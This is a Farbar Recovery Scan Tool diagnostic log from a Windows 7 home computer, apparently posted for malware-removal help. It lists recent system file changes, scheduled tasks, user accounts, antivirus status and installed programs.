2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:51 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe

2016-10-15 15:28 - 2016-09-09 07:51 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys

2016-10-15 15:28 - 2016-09-09 07:51 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe

2016-10-15 15:28 - 2016-09-09 07:48 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe

2016-10-15 15:28 - 2016-09-09 07:47 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe

2016-10-15 15:28 - 2016-09-09 07:43 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe

2016-10-15 15:28 - 2016-09-09 07:38 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe

2016-10-15 15:28 - 2016-09-09 07:38 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll

2016-10-15 15:28 - 2016-09-09 07:38 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe

2016-10-15 15:28 - 2016-09-09 07:38 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe

2016-10-15 15:28 - 2016-09-09 07:37 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:37 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll

2016-10-15 15:28 - 2016-09-08 10:34 - 00263680 _____ (Microsoft Corporation) C:\Windows\system32\WebClnt.dll

2016-10-15 15:28 - 2016-09-08 10:34 - 00208896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WebClnt.dll

2016-10-15 15:28 - 2016-09-08 10:34 - 00108544 _____ (Microsoft Corporation) C:\Windows\system32\davclnt.dll

2016-10-15 15:28 - 2016-09-08 10:34 - 00087040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\davclnt.dll

2016-10-15 15:28 - 2016-09-08 04:55 - 00142336 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys

2016-10-15 15:28 - 2016-09-08 04:55 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys

2016-10-15 15:18 - 2016-07-22 04:58 - 00142336 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe

2016-10-15 15:18 - 2016-07-22 04:51 - 00123904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe

2016-10-09 22:51 - 2016-09-12 11:17 - 00077032 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe

2016-10-09 22:51 - 2016-09-12 11:08 - 01226752 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll

2016-10-09 22:51 - 2016-09-09 05:54 - 01629184 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll

2016-10-09 22:51 - 2016-09-09 05:54 - 00586752 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll

2016-10-09 22:51 - 2016-09-09 05:54 - 00575488 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll

2016-10-09 22:51 - 2016-09-09 05:54 - 00314368 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll

2016-10-09 22:51 - 2016-09-09 05:54 - 00273408 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll

2016-10-09 22:51 - 2016-09-09 05:54 - 00224256 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll

2016-10-09 22:51 - 2016-09-09 05:54 - 00129024 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll

2016-10-09 22:11 - 2016-08-29 05:31 - 14183424 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll

2016-10-09 22:11 - 2016-08-29 05:31 - 01941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll

2016-10-09 22:11 - 2016-08-29 05:31 - 01867776 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll

2016-10-09 22:11 - 2016-08-29 05:12 - 12880384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll

2016-10-09 22:11 - 2016-08-29 05:12 - 01806848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll

2016-10-09 22:11 - 2016-08-29 05:12 - 01499648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll

2016-10-09 22:11 - 2016-08-29 05:04 - 03229696 _____ (Microsoft Corporation) C:\Windows\explorer.exe

2016-10-09 22:11 - 2016-08-29 04:55 - 02972672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe

2016-10-09 22:11 - 2016-08-16 10:40 - 00343552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys

2016-10-09 22:11 - 2016-08-16 10:40 - 00327168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys

2016-10-09 22:11 - 2016-08-16 10:40 - 00099840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbccgp.sys

2016-10-09 22:11 - 2016-08-16 10:40 - 00056320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbehci.sys

2016-10-09 22:11 - 2016-08-16 10:40 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbuhci.sys

2016-10-09 22:11 - 2016-08-16 10:40 - 00025600 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbohci.sys

2016-10-09 22:11 - 2016-08-16 10:40 - 00007808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbd.sys

2016-10-09 22:11 - 2016-08-12 07:02 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll

2016-10-09 22:11 - 2016-08-12 07:02 - 12574720 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL

2016-10-09 22:11 - 2016-08-12 07:02 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll

2016-10-09 22:11 - 2016-08-12 07:02 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx

2016-10-09 22:11 - 2016-08-12 07:02 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll

2016-10-09 22:11 - 2016-08-12 06:47 - 12574208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL

2016-10-09 22:11 - 2016-08-12 06:47 - 11410432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll

2016-10-09 22:11 - 2016-08-12 06:31 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll

2016-10-09 22:11 - 2016-08-12 06:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx

2016-10-09 22:11 - 2016-08-12 06:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll

2016-10-09 22:11 - 2016-08-12 06:26 - 00461312 _____ (Microsoft Corporation) C:\Windows\system32\scavengeui.dll

2016-10-09 22:11 - 2016-08-06 05:31 - 02023424 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll

2016-10-09 22:11 - 2016-08-06 05:31 - 00347136 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll

2016-10-09 22:11 - 2016-08-06 05:31 - 00310784 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll

2016-10-09 22:11 - 2016-08-06 05:31 - 00182272 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll

2016-10-09 22:11 - 2016-08-06 05:31 - 00054272 _____ (Microsoft Corporation) C:\Windows\system32\WsmRes.dll

2016-10-09 22:11 - 2016-08-06 05:31 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\wsmplpxy.dll

2016-10-09 22:11 - 2016-08-06 05:15 - 01178112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll

2016-10-09 22:11 - 2016-08-06 05:15 - 00249344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll

2016-10-09 22:11 - 2016-08-06 05:15 - 00214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll

2016-10-09 22:11 - 2016-08-06 05:15 - 00146944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll

2016-10-09 22:11 - 2016-08-06 05:15 - 00054272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmRes.dll

2016-10-09 22:11 - 2016-08-06 05:01 - 00266752 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe

2016-10-09 22:11 - 2016-08-06 05:01 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\wsmprovhost.exe

2016-10-09 22:11 - 2016-08-06 04:53 - 00199168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe

2016-10-09 22:11 - 2016-08-06 04:53 - 00012288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmprovhost.exe

2016-10-09 22:11 - 2016-08-06 04:53 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmplpxy.dll

2016-10-09 22:11 - 2016-06-14 07:21 - 00094440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys

2016-10-09 22:11 - 2016-06-14 07:16 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 01573888 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 01483264 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 01068544 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00680448 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00632320 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00499712 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00433152 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00295936 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00081920 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00037376 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msmmsp.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00008704 _____ (Microsoft Corporation) C:\Windows\system32\pcaevts.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll

2016-10-09 22:11 - 2016-06-14 07:11 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys

2016-10-09 22:11 - 2016-06-14 05:21 - 03209216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 01176064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00442368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00195072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll

2016-10-09 22:11 - 2016-06-14 05:15 - 00125952 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe

2016-10-09 22:11 - 2016-06-14 05:15 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe

2016-10-09 22:11 - 2016-06-14 05:15 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe

2016-10-09 22:11 - 2016-06-14 05:05 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe

2016-10-09 22:11 - 2016-06-14 05:05 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe

2016-10-09 22:11 - 2016-06-14 05:00 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\pcawrk.exe

2016-10-09 22:11 - 2016-06-14 05:00 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\pcalua.exe

2016-09-27 23:41 - 2016-09-28 00:49 - 00000000 ____D C:\Users\Wayne\Desktop\tabieats

2016-09-25 11:39 - 2016-10-09 22:34 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox

2016-09-25 10:52 - 2016-09-25 10:52 - 00000259 _____ C:\Users\Wayne\Desktop\Directions for Archiving (Dubbing) From VHS Tape to DVD Disc - ArchivingCartDirections.pdf.URL

2016-09-25 10:50 - 2016-09-25 10:50 - 00000266 _____ C:\Users\Wayne\Desktop\How to convert video to DVD convert VHS to digital - How-To - PC Advisor.URL

2016-09-25 10:45 - 2016-09-25 10:45 - 00709731 _____ C:\Users\Wayne\Desktop\Converting VHS Tapes to DVD_ A First-Hand Experience _ explora.pdf

2016-09-25 10:40 - 2016-09-25 10:40 - 00000303 _____ C:\Users\Wayne\Desktop\Converting VHS Tapes to DVD A First-Hand Experience explora.URL

2016-09-25 10:40 - 2016-08-12 06:26 - 00464896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys

2016-09-25 10:40 - 2016-08-12 06:26 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys

2016-09-25 10:40 - 2016-08-12 06:26 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys

2016-09-25 10:34 - 2016-08-05 05:30 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll

2016-09-25 10:34 - 2016-08-05 05:13 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll

2016-09-25 10:33 - 2016-08-16 07:36 - 01009152 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll

2016-09-25 10:33 - 2016-08-15 16:48 - 00833024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll

2016-09-25 10:33 - 2016-08-06 05:31 - 00877056 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll

2016-09-25 10:33 - 2016-08-06 05:15 - 00581632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll

2016-09-25 10:27 - 2016-09-25 10:27 - 00000383 _____ C:\Users\Wayne\Desktop\why does recording stop when copying vhs tape with many recording segments - Google Search.URL

2016-09-25 10:27 - 2016-09-25 10:27 - 00000243 _____ C:\Users\Wayne\Desktop\VHS to DVD Copy Keeps Stopping - Club Myce.URL

 

==================== One Month Modified files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2016-10-16 11:42 - 2009-07-13 18:45 - 00024608 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

2016-10-16 11:42 - 2009-07-13 18:45 - 00024608 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

2016-10-16 11:10 - 2011-10-23 13:51 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job

2016-10-16 11:08 - 2013-09-01 11:09 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job

2016-10-16 09:43 - 2016-04-28 18:44 - 00000000 ____D C:\QUARANTINE

2016-10-16 09:40 - 2011-10-23 13:51 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job

2016-10-16 09:39 - 2011-11-11 17:49 - 00000528 _____ C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job

2016-10-16 09:39 - 2011-11-11 17:49 - 00000466 _____ C:\Windows\Tasks\SystemToolsDailyTest.job

2016-10-16 09:39 - 2009-07-13 19:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT

2016-10-16 08:54 - 2011-11-11 17:49 - 00003488 _____ C:\Windows\System32\Tasks\SystemToolsDailyTest

2016-10-16 08:54 - 2011-11-11 17:49 - 00003448 _____ C:\Windows\System32\Tasks\PCDEventLauncher

2016-10-15 22:00 - 2014-09-20 20:59 - 00000000 ____D C:\ProgramData\APN

2016-10-15 16:43 - 2011-10-23 13:23 - 00000000 ____D C:\ProgramData\Lenovo

2016-10-15 16:34 - 2016-07-23 01:01 - 00000984 _____ C:\Users\Wayne\Desktop\PotPlayer 64 bit.lnk

2016-10-15 16:07 - 2013-09-01 11:42 - 00000000 ____D C:\Windows\System32\Tasks\TVT

2016-10-15 16:06 - 2011-10-23 13:43 - 00000000 ___HD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lenovo ThinkVantage Tools

2016-10-15 16:06 - 2011-10-23 13:42 - 00000000 ____D C:\Program Files (x86)\Lenovo

2016-10-15 16:00 - 2009-07-13 19:13 - 00782510 _____ C:\Windows\system32\PerfStringBackup.INI

2016-10-15 16:00 - 2009-07-13 17:20 - 00000000 ____D C:\Windows\inf

2016-10-15 15:53 - 2013-03-30 17:55 - 00000000 ____D C:\Program Files\Microsoft Silverlight

2016-10-15 15:53 - 2013-03-30 17:55 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight

2016-10-15 15:53 - 2009-07-13 18:45 - 00408216 _____ C:\Windows\system32\FNTCACHE.DAT

2016-10-15 15:41 - 2013-09-01 10:57 - 00000000 ____D C:\Windows\system32\MRT

2016-10-15 15:32 - 2011-11-19 20:17 - 143495576 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe

2016-10-15 15:31 - 2013-03-30 17:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight

2016-10-15 15:08 - 2014-09-20 21:04 - 00000000 ____D C:\Users\Wayne\AppData\Local\Adobe

2016-10-15 15:08 - 2013-09-01 11:09 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater

2016-10-15 15:07 - 2012-04-25 21:53 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe

2016-10-15 15:07 - 2011-11-19 20:14 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl

2016-10-15 15:07 - 2011-11-19 20:14 - 00000000 ____D C:\Windows\SysWOW64\Macromed

2016-10-15 15:07 - 2011-11-19 20:14 - 00000000 ____D C:\Windows\system32\Macromed

2016-10-15 15:02 - 2014-12-29 11:18 - 00002206 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

2016-10-15 14:59 - 2013-10-10 21:12 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk

2016-10-15 14:58 - 2015-07-19 08:51 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task

2016-10-09 22:55 - 2014-12-29 10:58 - 00000000 ____D C:\Windows\system32\appraiser

2016-10-09 22:55 - 2014-05-24 17:12 - 00000000 ___SD C:\Windows\system32\CompatTel

2016-10-09 22:35 - 2009-07-13 17:20 - 00000000 ____D C:\Windows\SysWOW64\Dism

2016-10-09 22:35 - 2009-07-13 17:20 - 00000000 ____D C:\Windows\system32\Dism

2016-10-09 22:34 - 2013-03-30 18:24 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service

2016-10-09 22:20 - 2014-02-23 21:37 - 00775124 _____ C:\Windows\SysWOW64\PerfStringBackup.INI

 

==================== Files in the root of some directories =======

 

2014-07-09 13:01 - 2014-07-09 13:01 - 0022976 _____ (Intel Corporation) C:\Users\Wayne\AppData\Roaming\JomCap.dll

2015-05-07 23:03 - 2015-05-07 23:05 - 0030877 _____ () C:\Users\Wayne\AppData\Local\WiDiSetupLog.20150507.230312.wdl

 

==================== Bamital & volsnap ======================

 

(There is no automatic fix for files that do not pass verification.)

 

C:\Windows\system32\winlogon.exe => File is digitally signed

C:\Windows\system32\wininit.exe => File is digitally signed

C:\Windows\SysWOW64\wininit.exe => File is digitally signed

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\SysWOW64\explorer.exe => File is digitally signed

C:\Windows\system32\svchost.exe => File is digitally signed

C:\Windows\SysWOW64\svchost.exe => File is digitally signed

C:\Windows\system32\services.exe => File is digitally signed

C:\Windows\system32\User32.dll => File is digitally signed

C:\Windows\SysWOW64\User32.dll => File is digitally signed

C:\Windows\system32\userinit.exe => File is digitally signed

C:\Windows\SysWOW64\userinit.exe => File is digitally signed

C:\Windows\system32\rpcss.dll => File is digitally signed

C:\Windows\system32\dnsapi.dll => File is digitally signed

C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed

C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

 

 

LastRegBack: 2015-05-12 20:50

 

==================== End of FRST.txt ============================

 

Here is the result of the FRST (scan) Addition.txt file:

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16-10-2016

Ran by Wayne (16-10-2016 12:00:26)

Running from C:\Users\Wayne\Desktop

Windows 7 Home Premium Service Pack 1 (X64) (2011-11-12 03:49:14)

Boot Mode: Normal

==========================================================

 

 

==================== Accounts: =============================

 

Administrator (S-1-5-21-3902107189-2783423906-2191778952-500 - Administrator - Disabled)

Guest (S-1-5-21-3902107189-2783423906-2191778952-501 - Limited - Disabled)

HomeGroupUser$ (S-1-5-21-3902107189-2783423906-2191778952-1002 - Limited - Enabled)

Wayne (S-1-5-21-3902107189-2783423906-2191778952-1000 - Administrator - Enabled) => C:\Users\Wayne

 

==================== Security Center ========================

 

(If an entry is included in the fixlist, it will be removed.)

 

AV: McAfee VirusScan Enterprise (Disabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

AS: McAfee VirusScan Enterprise Antispyware Module (Disabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}

 

==================== Installed Programs ======================

 

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 

Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 21.0.0.198 - Adobe Systems Incorporated)

Adobe Flash Player 23 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 23.0.0.185 - Adobe Systems Incorporated)

Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.185 - Adobe Systems Incorporated)

Adobe Reader XI (11.0.18) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.18 - Adobe Systems Incorporated)

Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.5.0.0 - Canon Inc.)

Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version:  - Canon Inc.)

Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.2.0 - Canon Inc.)

Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version:  - Canon Inc.)

Canon MX920 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX920_series) (Version: 1.00 - Canon Inc.)

